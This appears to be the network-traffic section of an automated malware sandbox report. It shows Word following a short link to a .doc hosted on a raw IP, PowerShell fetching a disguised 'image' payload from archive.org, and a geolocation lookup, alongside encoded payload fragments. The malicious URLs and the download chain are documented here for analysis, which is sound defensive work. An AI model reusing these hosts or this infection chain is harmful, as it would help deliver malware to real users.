                                        Sep 9, 2024 17:34:41.832624912 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                        Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                        Sep 9, 2024 17:34:41.832636118 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                        Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                        Sep 9, 2024 17:34:41.832647085 CEST1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                        Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                        Sep 9, 2024 17:34:41.832673073 CEST1236INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                        Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                        Sep 9, 2024 17:34:41.832683086 CEST1236INData Raw: 6f 2f 50 77 2f 6a 35 2f 77 39 50 53 2f 44 79 2f 34 37 50 79 2b 7a 70 2f 30 35 50 54 2b 54 69 2f 38 33 50 6b 39 54 53 2f 59 79 50 44 34 44 36 2b 34 74 50 55 37 6a 79 2b 41 73 50 32 36 44 72 2b 49 71 50 59 36 6a 6a 2b 51 6f 50 36 35 44 63 2b 59 6d
                                        Data Ascii: o/Pw/j5/w9PS/Dy/47Py+zp/05PT+Ti/83Pk9TS/YyPD4D6+4tPU7jy+AsP26Dr+IqPY6jj+QoP65Dc+YmPc5jU+gkP+4TN+4gPG0z79scPP2TU9QBPYzTy8oLPHyzf7s7Ozuzq7M2O+sDH6cvOorT26QBOGjjH4IwN+dTYzU5MPOzez01MLNjRxceMzGjgxwXMVAjKwsBMPAAAAQKAFAHAAAwP//j4/o9Pw+Ta/k0P98TM/0xP
                                        Sep 9, 2024 17:34:41.832693100 CEST776INData Raw: 35 44 55 2b 67 52 50 41 33 44 73 39 59 61 50 5a 32 7a 6a 39 41 59 50 6d 31 7a 58 39 67 56 50 52 31 6a 48 39 6b 51 50 45 77 7a 38 38 6b 4f 50 4c 7a 7a 72 38 30 4a 50 4c 79 44 66 38 49 67 4f 35 72 6a 30 36 63 6d 4f 41 6c 7a 6d 32 49 74 4e 7a 61 54
                                        Data Ascii: 5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYPMuDjcwsGMrAAAAAHAEAOAAAwPM/zn/w1PR9DS/QiP+7j9+cpPP6zX+4UPh2DN9QBPlzT38UMP5yjc84FPksDw7U3OstzY700OBtzI7sxOQszB6EvObrDo
                                        Sep 9, 2024 17:34:41.832703114 CEST1236INData Raw: 41 41 42 67 43 77 50 74 2b 54 6b 2b 51 6e 50 2b 30 7a 6b 39 4d 59 50 70 30 6a 42 38 41 4e 50 2b 79 7a 68 38 77 45 50 78 77 54 41 37 67 38 4f 54 74 54 52 37 41 30 4f 7a 73 54 48 37 63 77 4f 41 6f 7a 33 35 38 2b 4e 7a 66 7a 49 33 51 67 4e 69 62 44
                                        Data Ascii: AABgCwPt+Tk+QnP+0zk9MYPp0jB8ANP+yzh8wEPxwTA7g8OTtTR7A0OzsTH7cwOAoz358+NzfzI3QgNibDd2IlNCZTL2MSNCWTb1QWNXVDT0YPNuTTy0EMNTSDj0sHNxRzZ0AGNRRzS0QEN5ITvyIrMSFj+xQfMuHz2x0cMFHjrxQaMZGzkx4YMpFDYxwTM0AT9w0OMsCTow4EMIBAAAAKAEAJA/E+PZ/zy/M8P6+Ts/k6Ph+Tm
                                        Sep 9, 2024 17:34:41.832711935 CEST1236INData Raw: 42 41 41 41 38 7a 34 2f 55 32 50 4f 35 44 75 2b 34 6d 50 57 35 7a 42 39 77 66 50 6a 32 6a 67 38 73 4e 50 4b 79 6a 64 38 73 47 50 67 78 7a 57 38 45 46 50 4d 78 6a 4d 38 63 78 4f 71 76 6a 30 37 6f 35 4f 30 74 7a 56 37 45 69 4f 33 72 44 32 34 6f 4c
                                        Data Ascii: BAAA8z4/U2PO5Du+4mPW5zB9wfPj2jg8sNPKyjd8sGPgxzW8EFPMxjM8cxOqvj07o5O0tzV7EiO3rD24oLO1izh4YGOhhjL4cCOIcj/3g/NZfzz1sdNQXzl14YNjUTH1cRNNQTu0UKNfSTj00ENyQDI08ANGMD/zQ/MiPjmzE5M/NDez4gM9LD+ywuMnLD1ygsMBLjqyQpM+Jzby8jMjIDExkeMTDznw4GMjBDSwQCMIAAAAgLA
                                        Sep 9, 2024 17:34:41.832722902 CEST1236INData Raw: 66 6a 34 33 34 39 4e 61 66 6a 31 33 49 39 4e 4f 66 6a 79 33 59 38 4e 43 66 6a 76 33 6f 37 4e 32 65 6a 73 33 34 36 4e 71 65 6a 70 33 49 36 4e 65 65 6a 6d 33 59 35 4e 53 65 6a 6a 33 6f 34 4e 47 65 6a 67 33 34 33 4e 36 64 6a 64 33 49 33 4e 75 64 6a
                                        Data Ascii: fj4349Nafj13I9NOfjy3Y8NCfjv3o7N2ejs346Nqejp3I6Neejm3Y5NSejj3o4NGejg343N6djd3I3NudjaAAAAgCwAACAAAUjYAAAAMAwAwBwPQ/DW/UEPsyDq8QKPgyzm8YFPAsD/7g/O0vz77g+OxqzA5UfOXnDx3wyNocDJ3AyNbYj12AoN8ZDe2QnNvZDa2EDNDSTd0cFNENDlzE1MLNzOzIhMpLzwyEqMbKTjygoMCKDf
                                        Sep 9, 2024 17:34:41.837614059 CEST1236INData Raw: 51 70 4e 42 61 6a 4d 32 59 51 4e 6f 57 54 6c 31 6b 55 4e 44 56 6a 49 31 30 52 4e 54 55 44 43 30 34 50 4e 30 54 6a 37 30 67 4f 4e 69 54 44 33 30 6f 4d 4e 41 54 44 75 30 30 4b 4e 6e 53 54 6f 30 6f 49 4e 43 53 54 52 30 30 44 4e 76 51 54 4a 30 59 42
                                        Data Ascii: QpNBajM2YQNoWTl1kUNDVjI10RNTUDC04PN0Tj70gONiTD30oMNATDu00KNnSTo0oINCSTR00DNvQTJ0YBNLQjB0AwMnPj3zk9MKPjvzs6MjOzjzY4MBODezM3MsNTXzc1MKJDdyomMgJjVywkMGBAABQBADAEA/whP11j29kDPmyzE7AoOvnDB4IPOcjTp4cIOshDS4EDOUgDDAAAAsAwAwAwPA+za/YlP+TjNzcOAAAAFAMAI


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.2249174178.237.33.50803988C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 17:34:44.330090046 CEST71OUTGET /json.gp HTTP/1.1
                                        Host: geoplugin.net
                                        Cache-Control: no-cache
                                        Sep 9, 2024 17:34:44.930260897 CEST1170INHTTP/1.1 200 OK
                                        date: Mon, 09 Sep 2024 15:34:44 GMT
                                        server: Apache
                                        content-length: 962
                                        content-type: application/json; charset=utf-8
                                        cache-control: public, max-age=300
                                        access-control-allow-origin: *
                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.224916395.217.202.2104433320C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        TimestampBytes transferredDirectionData
                                        2024-09-09 15:34:25 UTC113OUTHEAD /rXgoN HTTP/1.1
                                        Connection: Keep-Alive
                                        User-Agent: Microsoft Office Existence Discovery
                                        Host: zeep.ly
                                        2024-09-09 15:34:26 UTC520INHTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:25 GMT
                                        Server: Apache
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Pragma: no-cache
                                        Set-Cookie: PHPSESSID=c9363eed4fe8dc8f138958714467c4b6; path=/
                                        location: http://85.239.241.184/50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1192.168.2.224916595.217.202.210443
                                        TimestampBytes transferredDirectionData
                                        2024-09-09 15:34:30 UTC124OUTOPTIONS / HTTP/1.1
                                        Connection: Keep-Alive
                                        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                        translate: f
                                        Host: zeep.ly
                                        2024-09-09 15:34:31 UTC349INHTTP/1.1 405 Method Not Allowed
                                        Date: Mon, 09 Sep 2024 15:34:30 GMT
                                        Server: Apache
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Pragma: no-cache
                                        Set-Cookie: PHPSESSID=0b0de3db09c6a724a144e423ce2247b7; path=/
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-09-09 15:34:31 UTC1746INData Raw: 36 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 09 09 09 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 09 09 09 09 3c 68 65 61 64 3e 0d 0a 09 09 09 09 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 09 09 09 09 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 09 09 20 20
                                        Data Ascii: 6c6<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1" /> <title>Error 405</title>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.224916695.217.202.2104433320C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        TimestampBytes transferredDirectionData
                                        2024-09-09 15:34:32 UTC343OUTGET /rXgoN HTTP/1.1
                                        Accept: */*
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        Host: zeep.ly
                                        Connection: Keep-Alive
                                        2024-09-09 15:34:32 UTC637INHTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:32 GMT
                                        Server: Apache
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Pragma: no-cache
                                        Set-Cookie: PHPSESSID=10158bad7d3baa8b930da2ea28e21eac; path=/
                                        Set-Cookie: short_478563=1; expires=Mon, 09-Sep-2024 15:49:32 GMT; Max-Age=900; path=/; HttpOnly
                                        location: http://85.239.241.184/50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc
                                        Content-Length: 0
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.224916895.217.202.2104433320C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        TimestampBytes transferredDirectionData
                                        2024-09-09 15:34:34 UTC200OUTHEAD /rXgoN HTTP/1.1
                                        User-Agent: Microsoft Office Existence Discovery
                                        Cookie: PHPSESSID=10158bad7d3baa8b930da2ea28e21eac; short_478563=1
                                        Content-Length: 0
                                        Connection: Keep-Alive
                                        Host: zeep.ly
                                        2024-09-09 15:34:34 UTC456INHTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:34 GMT
                                        Server: Apache
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Pragma: no-cache
                                        location: http://85.239.241.184/50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.2249170207.241.227.964433884C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-09-09 15:34:39 UTC113OUTGET /2/items/new_image_20240905/new_image.jpg HTTP/1.1
                                        Host: ia601706.us.archive.org
                                        Connection: Keep-Alive
                                        2024-09-09 15:34:39 UTC582INHTTP/1.1 200 OK
                                        Server: nginx/1.25.1
                                        Date: Mon, 09 Sep 2024 15:34:39 GMT
                                        Content-Type: image/jpeg
                                        Content-Length: 1931225
                                        Last-Modified: Thu, 05 Sep 2024 02:35:43 GMT
                                        Connection: close
                                        ETag: "66d918ff-1d77d9"
                                        Strict-Transport-Security: max-age=15724800
                                        Expires: Mon, 09 Sep 2024 21:34:39 GMT
                                        Cache-Control: max-age=21600
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                        Access-Control-Allow-Credentials: true
                                        Accept-Ranges: bytes
                                        2024-09-09 15:34:39 UTC15802INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                        2024-09-09 15:34:39 UTC16384INData Raw: 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b 33 82 a5 18 b5 55 83 ec 7d
                                        Data Ascii: G"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e3U}
                                        2024-09-09 15:34:39 UTC16384INData Raw: a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a 8d 7c a9 a3 d3 1d 8e 66 9c
                                        Data Ascii: ;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy|f
                                        2024-09-09 15:34:39 UTC16384INData Raw: 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca 08 5d b8 61 7c 63 e9 e4 28
                                        Data Ascii: )!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6]a|c(
                                        2024-09-09 15:34:39 UTC16384INData Raw: ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1 90 a2 ac 2e ae 15 68 10 4d
                                        Data Ascii: G8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui.hM
                                        2024-09-09 15:34:39 UTC16384INData Raw: dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d aa 8a 58 92 43 15 24 76 1f
                                        Data Ascii: q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]XC$v
                                        2024-09-09 15:34:39 UTC16384INData Raw: 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28 56 0e a7 72 f1 47 eb d7 8c
                                        Data Ascii: 62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(VrG
